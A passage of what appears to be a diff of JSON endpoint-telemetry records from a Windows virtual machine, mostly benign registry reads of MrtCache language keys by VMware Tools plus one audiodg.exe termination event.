Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5da1da56ec\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5da1da56ec\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570923400000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570923710000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d8fe5a311\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d8fe5a311\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570923710000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570924030000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5cb01d6579\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5cb01d6579\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570924030000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", - "timestamp": 131883570924650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8b754811\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8b754811\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570924650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "timestamp": 131883570925119984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5db8214a55\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5db8214a55\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570925119984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", - "timestamp": 131883570925280000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c95cbb64f\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c95cbb64f\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570925280000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570925590000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d36ffbc8b\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Getstarted_6.15.12641.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d36ffbc8b\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570925590000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570926369984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d33b3b668\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Messaging_4.1810.2922.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d33b3b668\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570926369984, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570926990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5c90e59d93\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.Microsoft3DViewer_5.1810.23012.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5c90e59d93\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570926990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "process", - "pid": 5812, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "subtype": "terminate", - "timestamp": 131883570927150000, - "unique_pid": "{42FC7E13-C9B7-5C05-0000-0010A6AC4901}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri", - "registry_value": 
"C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570927780000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri\\1d488aa1fd4cc8a\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.MicrosoftEdge_8wekyb3d8bbwe%5Cresources.pri\\1d488aa1fd4cc8a\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570927780000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570928250000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 
Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d9e6833ee\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MicrosoftOfficeHub_17.10314.31700.1000_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5d9e6833ee\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570928250000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri", - "timestamp": 131883570929650000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5da4bfd463\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.MSPaint_5.1810.25037.0_x64__8wekyb3d8bbwe%5Cresources.pri\\1d48b5da4bfd463\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570929650000, - "unique_pid": 
"{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883570930440000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d7fbd180a\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.People_10.1808.2473.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d7fbd180a\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570930440000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program 
Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570930740000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri\\1d488a96e81c592\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.PPIProjection_cw5n1h2txyewy%5Cresources.pri\\1d488a96e81c592\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570930740000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570931990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - 
"process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9db3639b\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed9db3639b\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570931990000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570932460000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97568a9e\\a01460c8", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97568a9e\\a01460c8\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570932460000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri", - "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Cortana_cw5n1h2txyewy%5Cresources.pri", - "timestamp": 131883570933550000, - "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" - }, - { - "event_type": "registry", - "pid": 6452, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 